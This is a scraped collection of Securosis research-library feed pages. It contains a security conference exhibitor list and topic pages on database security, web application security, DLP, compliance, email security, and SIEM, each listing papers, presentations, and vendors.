Watchers: Guarding the Keys to the Kingdom (Privileged User Management) Security Management 2.0: Time to Replace Your SIEM? Security Benchmarking: Going Beyond Metrics React Faster and Better: New Approaches for Advanced Incident Response Monitoring up the Stack: Adding Value to SIEM Understanding and Selecting SIEM/Log Management The Business Justification for Data Security Subscribe to our daily email digest

==> Vendor List

http://securosis.com/feeds/research Company Name Exhibitor Type Booth Number Sub-category Category Website 3M Mobile Interactive Solutions Division Exhibitor 2740 Mobile Security Endpoint Security http://solutions.3m.com/wps/portal/3M/en_US/Meetings/Home/ ActivIdentity Exhibitor 1128 Authentication Identity and Access Management http://www.actividentity.com/ Advanced Product Design Exhibitor 340 Advantech Exhibitor 217 AFC Industries Exhibitor 235 Furniture Other http://www.afcindustries.com/ Agiliance Exhibitor 2351 Compliance Security Management and Compliance http://www.agiliance.com/ Akamai Technologies Silver Sponsor 2017 Content Delivery http://www.akamai.com Alert Enterprise Exhibitor 351 Compliance Security Management and Compliance http://www.alertenterprise.com/ Alert Logic Exhibitor 2529 IDS/IPS Network Security http://www.alertlogic.com/ AlgoSec Exhibitor 856 Firewalls Network Security http://www.algosec.com/en/index.php AlienVault Exhibitor 652 SIEM/Log Management Security Management and Compliance http://www.alienvault.com/ Alta Associates Inc. Exhibitor 850 Compliance Security Management and Compliance http://www.altaassociates.com/ AMAX Information Technologies Exhibitor 346 http://www.amaxit.com/ American Portwell Technology, Inc. Exhibitor 628 http://www.portwell.com/ Anakam, an Equifax Company Exhibitor 226 Authentication Identity and Access Management http://www.anakam.com/ Anne Arundel Community College Exhibitor 2728 Education Other http://www.aacc.edu/ Anonymizer, Inc. Exhibitor 2722 Content Security Network Security http://www.anonymizer.com/ Antiy Labs Partner Pavilion 1541 Endpoint Security http://www.antiy.net/ Anue Systems Inc. Exhibitor 2445 Application Testing Application Security http://www.anuesystems.com/ APCON Exhibitor 832 http://www.apcon.com/ Application Security, Inc. Exhibitor 639 Database Security, Vulnerability Assessment Data Security, Security Management and Compliance http://www.appsecinc.com/ AppRiver Exhibitor 1059 Managed Services Email/Web Security http://www.appriver.com/ Approva Exhibitor 428 Compliance Security Management and Compliance http://www.approva.net/ Araknos SRL Unipersonale Exhibitor 347 SIEM/Log Management Security Management and Compliance http://www.araknos.it/en/azienda/azienda.html ArcSight Exhibitor 931 SIEM/Log Management Security Management and Compliance http://www.arcsight.com/ Armorize Technologies Inc. Exhibitor 329 Web Application Assessment Application Security http://www.armorize.com/ Art of Defence GmbH Partner Pavilion 1350 http://www.artofdefence.com/ Art of Defence GmbH Exhibitor 342 Web App Firewalls Application Security http://www.artofdefence.com/ Arxan Technologies Exhibitor 328 Secure Development Application Security http://www.arxan.com/ Astaro Exhibitor 2251 Firewalls, Email Security Gateway, Web Security Gateway Network Security, Email/Web Security http://www.astaro.com/ AT&T Exhibitor 831 http://www.att.com/ atsec information security Partner Pavilion 1350 Compliance Security Management and Compliance http://www.atsec.com/ Authentify, Inc. Exhibitor 1029 Authentication Identity and Access Management http://www.authentify.com/ Authernative, Inc. Exhibitor 550 Authentication Identity and Access Management http://www.authernative.com/ Avenda Systems Exhibitor 318 NAC Network Security http://www.avendasys.com/ Axway Silver Sponsor 2225 http://www.axway.com/ BeCrypt Inc. Exhibitor 2129 Disk Encryption Endpoint Security http://www.becrypt.com/ Beijing LinkTrust Technologies Development Co.,Ltd. Partner Pavilion 1541 Perimeter Defense Network Security http://www.linktrust.com.cn/ Beijing Topsec Science and Technology Co.,Ltd Partner Pavilion 1541 Beijing Venustech Inc. Partner Pavilion 1541 Perimeter Defense Network Security http://english.venustech.com.cn/ Beijing Zhongguancun Overseas Science Park Exhibitor 1541 http://www.zgc.gov.cn/english/ BeyondTrust Corp. Exhibitor 945 Anti-Malware Endpoint Security http://www.beyondtrust.com/ Bit9, Inc. Exhibitor 2621 Anti-Malware Endpoint Security http://www.bit9.com/ Bivio Networks Exhibitor 2133 Content Security Network Security http://www.bivio.net/ Black Box Network Services Exhibitor 2550 http://www.blackbox.com/ BlockMaster AB Exhibitor 2425 Mobile Security Endpoint Security http://www.blockmastersecurity.com/ Blue Coat Systems, Inc. Gold Sponsor 1139 Threat Mgmt, Anti-Malware, Web Security Gateway Network Security, Email/Web Security http://www.bluecoat.com/ BluePoint Security Exhibitor 2559 Cloud Security Virtualization and Cloud http://www.bluepointsecurity.com/ Brainloop Inc. Partner Pavilion 1350 Access Management Data Security http://www.brainloop.com/ BreakingPoint Systems, Inc. Exhibitor 951 Monitoring Network Security http://www.breakingpointsystems.com/ BroadWeb Corporation Partner Pavilion 1541 Perimeter Defense Network Security http://www.broadweb.com/ Bsafe Information Systems Inc. Exhibitor 855 Compliance Security Management and Compliance http://www.bsafesolutions.com/ BSI Partner Pavilion 1344 http://www.bsigroup.com/ C4ISR Journal Exhibitor 2650 Publication Other http://www.c4isrjournal.com CA Technologies Platinum Sponsor 1533 DLP, SIEM/Log Management, Compliance Data Security, Security Management and Compliance http://ca.com/ Capella University Exhibitor 251 Education Other http://www.capella.edu/ Cavium Networks Exhibitor 528 http://www.caviumnetworks.com/ Hardware CCSO.com Exhibitor 2619 http://www.ccso.com/ Disassembler Celestix Networks Exhibitor 852 Perimeter Defense Network Security http://www.celestix.com/ Cenzic, Inc. Exhibitor 332 Application Testing, Application Assessment Application Security http://www.cenzic.com/ Check Point Software Technologies Exhibitor 2317 Firewalls, IDS/IPS, Remote Access, Disk Encryption Network Security, Endpoint Security http://www.checkpoint.com/ Cherry Exhibitor 755 http://www.cherrycorp.com/ Hardware China quality certification certificate authority Partner Pavilion 1541 Compliance Security Management and Compliance http://www.cqc.com.cn/english/ CipherOptics Exhibitor 1923 Encryption Data Security http://www.cipheroptics.com/ Cisco Global Platinum Sponsor 1717 Firewalls, Remote Access, Threat Mgmt, Email Security Gateway, Web Security Gateway, Managed Services Network Security, Email/Web Security http://www.cisco.com/ Cloud Security Alliance Exhibitor 2718 http://www.cloudsecurityalliance.org/ Comodo Group, Inc. Exhibitor 2439 Endpoint Defense Endpoint Security http://www.comodo.com/ CoreTrace Corporation Exhibitor 1963 Anti-Malware Endpoint Security http://www.coretrace.com/ CORISECIO GmbH Partner Pavilion 1350 http://www.corisecio.com/ Coverity Exhibitor 333 Secure Development Application Security http://www.coverity.com/ Critical Watch Exhibitor 950 Compliance Security Management and Compliance http://www.criticalwatch.com/ Cryptography Research, Inc. Exhibitor 2233 http://www.cryptography.com/ Secure dev hardware cv cryptovision GmbH Partner Pavilion 1350 Encryption Data Security http://www.cryptovision.com/ Cyber-Ark Software, Inc. Exhibitor 2045 Authentication Identity and Access Management http://www.cyber-ark.com/ Cybera Exhibitor 752 Compliance Security Management and Compliance http://www.cybera.com/ Cyberoam Exhibitor 723 Perimeter Defense Network Security http://www.cyberoam.com/ Damballa Exhibitor 433 Endpoint Defense Endpoint Security http://www.damballa.com/ Dasient, Inc. Exhibitor 554 Endpoint Defense Endpoint Security http://www.dasient.com/ Dataguise Inc. Exhibitor 645 Database Security Data Security http://www.dataguise.com/ Department of Homeland Security/ US-CERT Exhibitor 457 http://www.us-cert.gov/ DeviceLock Exhibitor 2228 Mobile Security Subscribe to our daily email digest

==> Welcome to Securosis Research

http://securosis.com/feeds/research Download the Coverage Map (PDF) * About Our Research * About the Research Library About Our Research -------------- * Securosis is a new breed of IT research firm focusing on the broad information security and compliance markets. As opposed to relying on big sales forces and high pay walls, we publish our primary research for free on our blog. Yeah, we know, it’s different and scary. But it works. In terms of our primary research model, our focus is to help mid-market IT and security professionals successfully execute on their projects, by providing actionable information to accelerate their progress. It doesn’t mean our research isn’t relevant to large enterprises and government agencies. It just means our primary constituency is someone who wears a security hat as well as a number of other hats on a daily basis. Each week, Securosis publishes a ton of research on what’s happening in the security business, all focused on keeping our readers connected and focused on what’s important, not on the noise. Our weekly research includes: * Securosis FireStarter: Periodically Securosis holds an internal, no-holds-barred research meeting. Each analyst prepares a topic and the other analysts typically rip it to shreds. The end result is a thought generator that challenges our perspectives and demands further discussion. We publish the findings of that research to “stir the pot” a bit and get the echo chamber vibrating. * Securosis Incite: Something we’ve adopted from Security Incite is a hard-hitting summary of the news happening in our industry. Each Wednesday we send out 7-8 links with analysis of what’s happening out there and why it’s important. * Securosis Weekly Summary: Just in case you don’t have anything better to do over the weekend, on Friday we send out a list of things we’ve posted on the blog and also each analyst’s favorite outside post. This keeps you up to date on what we’ve been up to. * Ad Hoc Posts: Yes, the art of blogging is far from dead. During the week, once or twice a day we post something of interest. It could be a more detailed treatment of an announcement, something that’s been bothering us, or part of our primary research (which is always posted to the blog first). In case you are some kind of dinosaur and don’t use an RSS reader, you can sign up for email distribution of our blog posts. Sign up for the Daily Digest or the Weekly Summary.
For each of our coverage areas, we have a defined hierarchy of primary research documents we prepare to ensure deep coverage and actionable advice: * Understanding and Selecting: This series of posts provides the backdrop for each security domain. The research takes a product category perspective and helps readers understand why and how they’d use certain technology, and what is important when evaluating products and offerings. As an example, check out our work on Understanding and Selecting a Database Activity Monitoring Solution. * Building a [Topic] Program: The next level in our research is how to structure a security program to solve a specific problem. This is about more than just figuring out what product to buy, but the underlying processes and techniques required to address a specific problem. You can see our Building a Web Application Security Program for an example of this research. * Project Quant: For a select few coverage areas, we go very deep and actually define very granular process maps and establish metrics to quantify those processes for an aspect of security. We do a public survey to make sure we nail the process map and publish the survey results when we get a statistically significant sample. Check out Project Quant for Patch Management to understand this research.
About the Research Library
Are you tired of having to hunt through screen after screen of crappy search results just to find the few bits of information you need? Or trawl through endless forums and unrelated blog entries just to educate yourself on a new topic? We are too… that’s why we created the Securosis Research Library. The Library is designed to be your first stop when researching a new topic. We’ve collected our best blog posts, white papers, and multimedia materials together in a structure designed to help you find what you need as quickly as possible. Unlike search results or a wiki, we’ve organized the material for each topic in the order we think it will be most useful, rather than by date or some other arbitrary sorting method. We don’t cover every security topic you could think of, but we’re constantly expanding into new areas and filling in coverage that’s lighter than we’d like. Where possible, for technology-related topics we include a list of Free/Open Source and commercial products. We try to keep these lists updated, but if you see something we are missing please email us so we can add it. This is just a list of what’s available in alphabetical order – we aren’t endorsing any particular products. We update the material in the Library on an ongoing basis, and each entry is dated with the last update. If you’d like to keep your own copy, just subscribe to the RSS feed. Since we update the date on each entry when we make changes, your RSS reader should keep a current, local copy of the entire library. Pretty cool, eh? We hope you find it useful, and please email us with any suggestions, errors, or omissions. Subscribe to our daily email digest

==> Endpoint Security

http://securosis.com/feeds/research Stand by for our endpoint security page. Subscribe to our daily email digest

==> Security Management

http://securosis.com/feeds/research Stand by for our security management page. Subscribe to our daily email digest

==> Network Security

http://securosis.com/feeds/research Stand by for our network security page. Subscribe to our daily email digest

==> Cloud and Virtualization

http://securosis.com/feeds/research This is one of the newest areas of our coverage, and although cloud computing and virtualization are distinct technologies, they are very closely related. Subscribe to our daily email digest

==> Compliance

http://securosis.com/feeds/research Papers and Posts ------------ This section covers compliance topics and several general security issues related to compliance with industry and governmental regulations. This is a new section for us, and while we have a ton of information on this topic, we will be evolving how we present the material over time. These articles are strategic in nature, but we will be adding videos and podcasts for hands-on guidance in the coming weeks. General Coverage ------------ 1. It Isn’t Risk Management If You Can’t Lose 2. Visa’s Data Field Encryption 3. Tokenization Will Become the Dominant Payment Transaction Architecture 4. Some Follow-Up Questions for Bob Russo, General Manager of the PCI Council 5. We Know How Breaches Happen 6. New Details, and Lessons, on Heartland Breach 7. Heartland Hackers Caught; Answers and Questions 8. An Open Letter to Robert Carr, CEO of Heartland Payment Systems Presentations --------- * Presentation on Tokenization Guidance for PCI. * Presentation on Data Breaches and Encryption. * Presentation on Data Protection in the Enterprise. This is a corporate overview. * Presentation on Encrypting Mobile Data for the Enterprise. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Please email info@securosis.com if you have any additions or corrections. Subscribe to our daily email digest

==> Database Security

http://securosis.com/feeds/research Database Security is one of the broader topics that Securosis covers. Database servers are highly complex systems – storing, organizing, and managing data for a wide array of applications. Most mid-sized firms have dozens of them, some embedded in desktop applications, while others serve core systems such as web commerce, financials, manufacturing, and inventory management. A Fortune 100 company may have thousands. To address the wide range of offerings and uses, we will cover database security from two different angles. The first is the security of the application itself, and the second is the use and security of the data within the database. Database Vulnerability Assessment (VA), access control & user management, and patch management are all areas where preventative security measures can be applied to a database system. For securing the data itself, we include such topics as Database Activity Monitoring (DAM), auditing, data obfuscation/masking, and database encryption. Technologies like database auditing can be used for either, but we include them in the later category because they provide a transactional view of database usage. We also include some of the database programming guidelines that can help protect databases from SQL injection and other attacks against application logic. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and comments). 1. Understanding and Selecting a Database Security Platform is our new comprehensive database security paper. 2. Database Activity Monitoring research paper remains a reader favorite and can be downloaded here: “Understanding and Selecting a Database Activity Monitoring Solution” white paper. 3. Understanding and Selecting a Database Assessment Solution is now available. We are very happy with this paper. We have even been told by database assessment vendors their product teams learned some tips from this paper, and we think you will too. 4. Our Understanding and Selecting a Database Encryption or Tokenization Solution paper is available. 5. Database Audit Events is a comprehensive list of database events available through native database auditing techniques. 6. Many supporting posts on Database Encryption: Application vs. Database Encryption and Database Encryption: Fact vs. Fiction, Format and Datatype Preserving Encryption, An Introduction to Database Encryption, Database Encryption Misconceptions, Media encryption options for databases,and threat vectors to consider when encrypting data. 7. The 5 laws of Data Masking. Database Security Patch Coverage
1. Oracle Critical Patch Update, July 2009. General Coverage ------------ 1. SQL Injection Prevention 2. Database Audit Performance in this Friday Summary introduction 3. Database Encryption Benchmarking 4. Three Database Roles: Programmer, DBA, Architect 5. Database Security: The Other First Steps 6. Sentrigo and MS SQL Server Vulnerability. 7. Amazon’s SimpleDB. 8. Information on Weak Database Password Checkers. 9. Database Connections and Trust, and databases are not typically set up to validate incoming connections against SQL injection and misused credentials, and this post on recommending Stored Procedures to address SQL Injection attacks 10. Separation of Duties and Functions through roles and programmatic elements, and putting some of the web application code back into the database. 11. Native database primary key generation to avoid data leakage and inference problems, and additional comments on Inference Attacks. 12. Your Top 5 Database Security Resolutions. 13. Posts on separation of duties: Who “Owns” Database Security, and the follow-up: DBAs should NOT own DAM & Database Security. 14. A look at general threats around using External Database Procedures and variants in relational databases. 15. Database Audit Events. 16. Database Security Mass-Market Update and Friday Summary - May 29, 2009 17. Database Patches, Ad Nauseum 18. Acquisitions and Strategy 19. Comments on Oracle’s Acquisition of Sun 20. Oracle CPU for April 2009 21. Netezza buys Tizor 22. More Configuration and Assessment Options. Discusses recent Oracle and Tenable advancements. 23. Policies and Security Products applies to database security as well as other product lines. 24. Oracle Security Update for January 2009. 25. Responding to the SQL Server Zero Day: Security Advisory 961040 includes some recommendations and workarounds. 26. Will Database Security Vendors Disappear? and Rich’s follow-on Database Security Market Challenges considerations for this market segment. 27. Behavioral Monitoring for database security. 28. NitroSecurity acquired RippleTech. 29. Database Monitoring is as big or bigger than DLP. Presentations --------- * Rich’s presentation on Understanding and Selecting a Database Activity Monitoring Solution. (PDF) * Oracle database Security in a Down Economy. (PDF) Podcasts, Webcasts and Multimedia
None at this time Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Database Security Platforms * Application Security Inc. (DBProtect) * Fortinet. * GreenSQL. * IBM (Guardium). * Imperva (SecureSphere) * McAfee (Sentrigo) (Nitro). * Oracle (Secerno). Database Vulnerability Assessment * Application Security Inc.. (AppDetective, DBProtect) * Fortinet. (IPLocks). * IBM (Guardium). * Imperva. (DAS, Scuba) * McAfee. (Sentrigo) * Oracle. (mValent, Config. Packs) * Qualys. * Tenable Network Security. (Nessus) * Next Generation Security Software NGS. (Squirrel) Database Encryption * NetLib. * Oracle. (TDE, API) * Protegrity. * Prime Factors. * Relational Wizards. * RSA. (Valyd) * SafeNet. (Ingrian) * Sybase. * Thales. (aka nCipher) * Trustwave. (Vericept) * Voltage. Note that some of the vendors listed provide transparent disk encryption or application layer encryption that can be applied to database files or content. Database Auditing * GreenSQL * Oracle (Audit Vault). * SoftTree Technologies. (DB Audit Expert) * Quest. (InTrust for DB) Note that all DAM vendors provide auditing to one degree or another. This section is to designate specific products that provide database auditing, are not part of a DAM solution, and are not built into a database platform as a standard component. Database Masking * Axis Technology. * Camouflage. * dataguise. * Embarcadero. * Grid-Tools. * GreenSQL. * Hexaware/Akiva. * IBM. (Optim/Princeton Softech) * Informatica. (ETL + Applimation) * MENTiS Software. * Voltage. (ETL + Dynamic) Note that there are several vendors who offer format preserving encryption and tokenization, such as NuBridges, Prime Factors, Protegrity and Voltage, which also provides some masking capabilities. Database Vendors * IBM. * Oracle. (Oracle, MySQL) * Sybase. * Teradata. * Apache. (Derby) * PostgreSQL. (Postgres) * Ingres. (Open Ingres) There are dozens of vendors, both big and small, who offer databases – many with specific competitive advantages. We aren’t even attempting to comprehensive, and specifically ignored any without widespread mainstream adoption. There are also dozens more open source databases with small numbers of deployments, perhaps primarily embedded in applications or backending non-commercial web applications. Subscribe to our daily email digest

==> Web Application Security

http://securosis.com/feeds/research Here we focus on security specifically for web applications, as opposed to traditional corporate or enterprise applications. Our research pages on general application security should be used in tandem with this one, but this section focuses on the unique issues of web application security. By our definition, Web Application Security is a super-set of traditional application security. Why? Because more often than not, web applications are backed by enterprise applications. They have all of the same problems, along with a handful of new security issues that are specific to offering distributed programs and functions across the Internet. For example web applications offer features and functions to users outside the corporate network, so they cannot make any assumptions about the security of the network transmission nor the intentions of the user. They run on top of a complex conglomeration of services, consist primarily of custom code, produce dynamic content, and provide their UI entirely through a browser. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on Web Application Security is Building a Web Application Security Program. For those of you who followed along with the blog series, this is a compilation of that content, but it’s been updated to reflect all the comments we received, with additional research, and the entire report was professionally edited. The original blog series can be found here (Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7, and Part 8. As well as a couple points we forgot to mention. 2. Rich’s post on How the Cloud Destroys Everything that I Love (About Web App Security). 3. The Risks of Trusting Content. 4. Web Application Security: We Need Web Application Firewalls to Work. Better. General Coverage ------------ 1. XML Security Overview 2. It’s Thursday the 13th—Update Adobe Flash Day 3. Heartland Hackers Caught; Answers and Questions 4. Using a Mac? Turn Off Java in Your BrowserWere All Gonna Get Hacked is about the browser, not the app, but we’ll cross reference here. 5. There Are No Trusted Sites: Security Edition 6. Click-jacking Details, Analysis, and Advice. 7. Comments on “Containing Conficker”, a brief analysis of the Honeynet Project’s Know Your Enemy paper, an examination of how the Conficker worm attacks and behaves in general. 8. WAF vs. Secure Code vs. Dead Fish. 9. Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. Presentations --------- * Our presentation on Building A Web Application Security Program. This was presented as supplementary material to the white paper of the same name. * Presentation on Integrating Penetration Testing Into a Web Application Vulnerability Assessment Program. (PDF) Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Remember that web application security is over and above the standard application security practices and technology, and these should be considered alongside other tools. We strongly encourage you to learn about the specifics of subcategories in the navigation menu. Web Application Assessment * Cenzic * HP * Secure Works * WhiteHat Security Penetration Testing * AppLabs * Bonsai * CGISecurity * Core Security Technologies * McAfee (Foundstone) * Plynt * Rvasi * WindowSecurity.com Static Source Code Review * Aspect Security * Cigital * Fortify * IBM * Ounce * Veracode Dynamic Source Code Review * Coverity * Ounce * Veracode Web Application Firewalls * armorlogic. * ArtofDefense Hyperguard * Barracuda Networks. * Breach. * Cisco. * F5. * Fortify. * Fortinet * Imperva. * Protegrity. Monitoring (All WAF vendors can monitor as well.) Education & Training * SANS Institute * SAIC Most regional ISSA and ISACA chapters can provide assistance as well. Subscribe to our daily email digest

==> Web, Email, and Data Portal Security

http://securosis.com/feeds/research This research page covers web filtering as well as email security and anti-spam options. The email security market, like the web gateway market, is one of the most saturated and commoditized in the security industry. As with firewalls and anti-virus (on Windows), it is essentially impossible to do business without these tools. And to no one’s surprise we see continued convergence of these threat protection products; in some cases, it’s merely mergers and acquisitions to provide two separate products from the same vendor, but in other cases we see combined solutions – often in an attempt to displace point products. As many of the site-managed solutions also offer gateway and secure data exchange services, we will cover that here as well. The intended audience for this page is those interested in security products for their business, to keep their users’ inboxes free of spam, and ensure Internet browsing stays within company policy. In the past we would just have said ‘bleep’, as that is why many of these platforms are purchased. In reality there are many other security and compliance uses for these technologies, which are as least as important. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. Barracuda Networks Acquires Purewire 2. McAfee Acquires MX Logic 3. The Symantec acquisition of MessageLabs demonstrates that the battle for this fully commoditized market is not over. 4. Marshal8e6 Buys Avinti, and how the smaller vendors need to innovate and re-position their technologies to compete. General Coverage ------------ 1. The First Phishing Email I Almost Fell For 2. I Heart Creative Spam 3. Spam Levels and Anti-Spam SaaS. 4. Hackers 1, Marketing 0. Presentations --------- PDF versions of presentations (when available) may also be useful, although they don’t include any audio (for any audio/video, please see the next section). Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email if you have any additions or corrections. Vendors * Aladdin * Astaro * Axway (Tumbleweed) * Barracuda Networks * Cisco (Ironport) * Clearswift (MIMESweeper) * Cloudmark * CommTouch * Google (Postini) * Marshal8e6 (Mail Marshal + 8e6 Technologies) * McAfee (IronMail, WebWasher, Secure Computing, CipherTrust) * Proofpoint * SonicWall (MailFrontier) * Symantec (BrightMail and MessageLabs) * WebSense Subscribe to our daily email digest

==> Research: Data Loss Prevention

http://securosis.com/feeds/research We’ve probably written more about Data Loss Prevention than any other single technology. Actually, we prefer to call it Content Monitoring and Protection (CMP), but when we use that only about 3 people know what we’re talking about. We define CMP/DLP as: Products that, based on central policies, identify, monitor, and protect data at rest, in motion, and in use through deep content analysis. We use a pretty narrow definition to keep things clear – CMP/DLP is a defined product category, not some general definition for anything that protects data. Encryption, DRM, portable device control, and all the other things that call themselves DLP can help with data loss, but aren’t DLP. We think using a big bucket like that only confuses people. The best way to tell if something is DLP is to focus on the content awareness/analysis. If it only uses keywords or basic regular expressions, it isn’t really DLP. Now why should you care about DLP? Is it just another over-hyped technology? Nope – we consider it to be one of the most significant security technologies to emerge over the past few years. By adding content and context awareness, we can now protect information based on what it is, as opposed to where it’s stored or some silly label someone slapped on it as metadata. CMP tools are also expanding their understanding of business context, not just the data itself, so we can apply intelligent policies that reflect business processes, while only interfering with said processes when there is a policy violation. CMP helps us find our sensitive information, watch how it’s being used, and then protect it. It’s far from perfect, but it’s still good enough that we recommend it, and we’d use it ourselves if we didn’t just give away all of our stuff for free. We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it was added to help you find changes more easily. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all of the public comments as well). 1. The most important piece of work we’ve published on CMP/DLP is our white paper, [Understanding and Selecting a Data Loss Prevention Solution(/research/publication/report-data-loss-prevention-whitepaper/). This report covers all the basics- features, architectures, use cases, and a recommended selection process with testing criteria. It was originally released as a series of blog posts: part 1 (introduction), part 2 (content awareness), part 3 (data-in-motion), part 4 (data-at-rest), part 5 (data-in-use/endpoint), part 6 (central administration), and part 7 (selection process). This is really the place to start if you need to learn about DLP. 2. I also wrote a feature for Information Security Magazine that covers similar material, but is much more condensed. 3. We also released a paper on Best Practices for DLP Content Discovery. This covers all the important issues when using DLP for data at rest. It was also a 6 part series: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 4. The third paper in our CMP/DLP series is dedicated to Best Practices for Endpoint DLP. As always, available in a series of blog posts: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 5. An early article on DLP as a feature vs. a full solution: DLP Is A Feature, CMF (Or Whatever We’ll Call It) Is A Solution. 6. A discussion on the evolution of CMP: DLP/ILP/Extrusion Prevention < CMF < CMP < SILM: A Short Evolution of Data Loss Prevention. 7. A short piece I did for Network World on DLP, and why it’s worth looking at now. 8. I’m a big proponent of full DLP solutions- this explains why: Data Protection Isn’t A Network Security Or Endpoint Problem. 9. The dirty little secret of DLP. 10. Data protection developments are running along parallel paths – one for productivity applications and communications (CMP/DLP), and the other in the data center (ADMP). Our definitions of DLP and ADMP. 11. Then a post on how those two worlds will connect. 12. A Network World article I wrote on pitfalls of DLP. 13. A look at the differences between DLP, content classification, and e-discovery. 14. You can also use DLP to help prevent malicious outbound connections from sophisticated attackers. 15. In Quick Wins with Data Loss Prevention we cut through the complexity and provide a process for getting immediate value out of your DLP investment, while still setting yourself up for the long term. Presentations --------- Presentation on Understanding and Selecting a Data Loss Prevention System. This is a companion to the DLP White Paper. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Note that many other products include “DLP light” features, such as basic keyword or regex matching. We are only including dedicated DLP solutions here. Full Suite DLP * CA (Orchestria) * Code Green Networks * EMC/RSA (Tablus) * GTB Technologies * McAfee (Reconnex) * Symantec (Vontu) * Vericept * Websense (PortAuthority) * Workshare Network-only tools * Clearswift * Fidelis Security Systems * Palisade Systems * Proofpoint Endpoint-only tools * NextSentry * Trend Micro (Provilla) * Verdasys Subscribe to our daily email digest

==> Application Security

http://securosis.com/feeds/research This section of the research library is dedicated to application security in its many forms. On this page we cover the basic topics; such as Access Control, Monitoring & IDS, SIM, SEM, and Log Management. For other specialized fields within application security, such as web application security and secure software development practices, we provide dedicated subsections. On the navigation bar you will see that we already have a few pages for specific coverage areas. We will continue to fill out our application security offerings, and provide additional specific coverage areas over time. Feel free to make a request if you have something in this area you are interested in seeing. Papers and Posts ------------ * Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. * How Common Applications Are (Now) the Weakest Link. * Comments on “Containing Conficker” considers some of the challenges most application developers are up against. * Immutable Log technologies help with auditing and event trail verification. * For application security, the implementation and management of a policy set is a key factor in the cost and effectiveness of just about any security product (and, frankly, your happiness as well). * Separation of Duties, Concept of Least Privilege, and other role-based user security measures. * The Perils of the Insider Threat. * PDF Security Pain, and stuff to think about on all script-enabled applications. * A very cool way of reverse engineering applications and content with Visual Forensic Analysis tools. Presentations --------- * Security + Agile = FAIL. Live presentation is here. * This presentation covers Major Enterprise Application Security. Podcasts, Webcasts and Multimedia
Subscribe to our daily email digest

==> SIM, SIEM, and Log Management

http://securosis.com/feeds/research This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. SIEM, Today and Tomorrow is a look back at some of the evolutionary struggles of SIM/SEM, and what is happening with the market space today. 2. LogLogic Acquires Exaprotect. 3. It seems like every other post we mention SIM/SEM and Log Management. We get a briefing from a vendor nearly every week, and we both know and cover this space. Creating this research page, we realized just how few posts we have written that are dedicated to it. We will provide more in the coming weeks. General Coverage ------------ 1. Policies and Security Products, covering the expense of policy creation and maintenance. Presentations --------- 1. Adrian’s presentation on Meeting Compliance with SIM, SEM and Log Management provides an in-depth discussion of using SIM/SEM and Log Management products for meeting compliance, and offers practical tips in dealing with technical and process challenges. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products we are aware of in this area (including free tools). It does not imply endorsement, and is meant to assist you, should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Vendors ArcSight CA CISCO MARS eIQ ExaProtect IBM Intellitactics LogLogic LogRhythm NetForensics NetIQ NitroSecurity Quest InTrust RSA EnVision Sensage Symantec SSIM Tenable TriGeo Q1 Labs Subscribe to our daily email digest

==> Project Quant

